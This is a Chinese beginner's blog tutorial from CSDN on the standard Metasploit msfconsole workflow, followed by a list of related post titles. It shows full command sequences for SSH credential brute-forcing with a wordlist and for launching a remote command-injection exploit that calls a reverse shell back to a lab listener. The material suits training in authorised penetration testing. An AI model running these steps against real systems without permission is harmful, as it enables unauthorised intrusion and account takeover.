Metasploit进行渗透测试的常用流程【入门】
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它具有图形化界面和命令行界面,这里讲的是msfconsole惯用的操作流程。本章使用的metasploit v5.0.2-dev版本,所以进入到msfconsole时,前缀是"msf5>",kali系统可以通过界面化启动metasploit,通过命令行启动服务,执行命令,metasploit依赖postgresql数据库:
service postgresql start #启动postgresql服务
service metasploit start #启动metasploit服务
第一步,search 模块名
在进行攻击之前,搜集了足够多的信息,如果没有搜集足够的信息,想通过metasploit的辅助模块来搜集相关系统的信息。可以在msfconsole的命令行输入你想搜集的信息。或者查看所有辅助模块。可以执行命令,这里使用了-S 参数:
msf5>search -S auxiliary auxiliary
第二步,use 模块名
查找到相关模块后,选择所需模块。这里以auxiliary/scanner/ssh/ssh_login为例,该模块功能是"ssh登录检查扫描",执行命令是:
msf5>use auxiliary/scanner/ssh/ssh_login
第三步,info
查找使用模块的信息的信息,这里使用第二步加载的模块:
msf5 auxiliary(scanner/ssh/ssh_login)>info
会显示模块的一下描述信息及基本参数信息。
第四步,show payloads
显示该模块可以使用的攻击载荷,如果是scanner时不需要使用(如果执行该命令,显示的所有可用的攻击载荷),,如果是exploit可以使用该命令查看可以使用的攻击载荷。例如选择攻击模块为“exploit/linux/http/logsign_exec”,该模块是“loginsign远程命令注入”,执行命令如下:
msf5 exploit(linux/http/logsign_exec)>show payloads
会显示该攻击模块可以使用的攻击载荷。
第五步,set payload 攻击载荷
按照第四步选择的那个攻击模块“exploit/linux/http/logsign_exec”,从攻击载荷中选择一个攻击载荷,例如选择“generic/shell_reverse_tcp”这个攻击载荷,该载荷的功能是“通用的shell命令,反射TCP连接”,操作命令是:
msf5 exploit(linux/http/logsign_exec)>set payload generic/shell_reverse_tcp
设置成功,会在命令行提示“payload=>generic/shell_reverse_tcp”。
第六步,show targets
查看攻击目标信息。
show targets
第七步,show options/advance
show options查看攻击和负载模块的基本配置参数。show advanced查看攻击和负载模块的高级配置参数。执行命令如下:
msf5 exploit(linux/http/logsign_exec) show options
msf5 exploit(linux/http/logsign_exec) show advanced
第八步,set name
设置攻击与载荷模块的配置参数。这里只设置要攻击的目标地址IP“RHOSTS”,载荷的本地地址IP“LHOST”,其他使用默认值。
msf5 exploit(linux/http/logsign_exec)>set RHOST 192.168.88.138
msf5 exploit(linux/http/logsign_exec)>set LHOST 192.168.88.132
设置成功后在命令行显示:“RHOSTS => 192.168.88.138、LHOSTS => 192.168.88.132”
如果是辅助扫描模块。这里设置使用的目标地址IP“RHOSTS USERPASS_FILE ” :
msf5 auxiliary(scanner/ssh/ssh_login)>set RHOSTS 192.168.88.137
msf5 auxiliary(scanner/ssh/ssh_login)>set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
第九步,exploit/run
参数设置完毕。执行攻击命令进行攻击。如果是scanner模块,可以跳过“第三、四、五、六”步,执行第七步参数配置后,执行run命令进行扫描。如果是‘auxiliary/scanner/ssh/ssh_login’执行命令:
msf5 auxiliary(scanner/ssh/ssh_login)>run
如果是“exploit/linux/http/logsign_exec”执行命令:
msf5 exploit(linux/http/logsign_exec)> exploit
第十步,session -l
列出所有可用的交互会话以及详细信息。
msf5 exploit(linux/http/logsign_exec)>session -l
第十一步,session -i Id
通过指定Id,进入指定会话。例如进入会话的Id为2,执行命令是:
msf5 exploit(linux/http/logsign_exec) >session -i 2
进入当前活动会话,可以进行一些shell命令的操作。
总结
通过上述一些操作流程,能进行简单的攻击学习。该流程适合入门,可以培养安全测试的兴趣。孰能生巧,该流程比较多,可能熟练之后,这么多步,可能只需要五步,如果有问题可以加入群讨论
---------------------
作者:坏蛋是我
来源:CSDN
原文:https://blog.csdn.net/henni_719/article/details/89276935
版权声明:本文为博主原创文章,转载请附上博文链接!
Metasploit进行渗透测试的常用流程【入门】相关推荐
- 【3】web安全入门篇-渗透测试中常用的命令
1.linux命令 渗透测试中常用的linux命令 上面博客提到的基本都能满足需求 2.cmd命令 常用的cmd命令 cmd命令和linux命令常用的对于web入门的萌新可以看看上面博客,多敲一敲用的 ...
- Kali Linux渗透测试实战 1.3 渗透测试的一般化流程
1.3 渗透测试的一般化流程 凡事预则立,不预则废,做任何事情都要有一个预先的计划.渗透测试作为测试学科的一个分支,早已形成了完整的方法论.在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali ...
- Kali Linux渗透测试实战 1.3 渗透测试的一般化流程_商洛学院司徒荆_新浪博客
1.3 渗透测试的一般化流程 凡事预则立,不预则废,做任何事情都要有一个预先的计划.渗透测试作为测试学科的一个分支,早已形成了完整的方法论.在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali ...
- 网络安全渗透测试的常用工具
文章目录 1.3.1 Nmap 1.3.2 Maltego 1.3.3 Recon-NG 1.3.4 OpenVAS 1.3.5 Metasploit 1.3.6 SET 1.3.7 Ettercap ...
- 渗透测试中常用端口及利用
渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...
- 渗透测试实战-BurpSuite 使用入门
前言 近期笔者在学习 web 渗透测试的相关内容,主要是为了公司之后的安全产品服务.渗透测试本身在学习过程中还是很有意思的,有一种学习到了之前想学但是没学的黑客技术的感觉,并且对笔者已掌握的许多知识做 ...
- Metasploit(MSF)渗透测试框架使用教程及基本命令
第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍 Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一.使您能够 ...
- metasploit mysql_Metasploit渗透测试:选择模块
原标题:Metasploit渗透测试:选择模块 当用户准备 攻击 时,首先需要选择针对目标 漏洞的模块.在MSF终端,提供了多个命令,可以帮助用户完成模块选择工作,如搜索模块.加载模块和编辑模块等. ...
- 渗透测试|网络安全常用靶场
搭建教程网络上随便一搜一大堆,这里就不再赘述 vulhub 免费开源漏洞靶场 www.vulhub.org vulnhub 国外的一个靶场,难度中上(类似于真实渗透环境) https://www.vu ...
最新文章
- OKR不会颠覆KPI,而是融合应用!
- EBGAN, LSGAN, BEGAN
- java 连接池实例_功能完善的Java连接池调用实例
- 第四届程序设计竞赛(天梯赛)华南赛区回顾
- 苹果又想出涨价新招,iPhone 12将标配AirPods耳机?
- 硬件故障-笔记本电脑开不了机故障处理
- Codeforces 57C Array dp暴力找到规律
- TeamWork#3,Week5,The First Meeting of Our Team
- Unity3D视图介绍
- html 获取浏览器宽高,js获取浏览器高度与宽度的方法
- DPDK——IP分片和重组库
- netty 学习笔记(一)
- 全国省市县三级数据库
- 【百战GAN】适合所有人的第一个GAN项目:DCGAN图像生成代码实战
- 解决pip下载速度过慢及超时等其它的报错的方法适于多种操作系统(详细)
- C/C++语言100题练习计划 83——背包问题(贪心算法实现)
- 摄像头8mm可以看多远_监控摄像头有多少种,如何来选型
- 适配 iphone 微信h5页面
- Invalid bound statement (not found): com.example.demo.mapper.getUser.
- Thor 0.0.2 发布!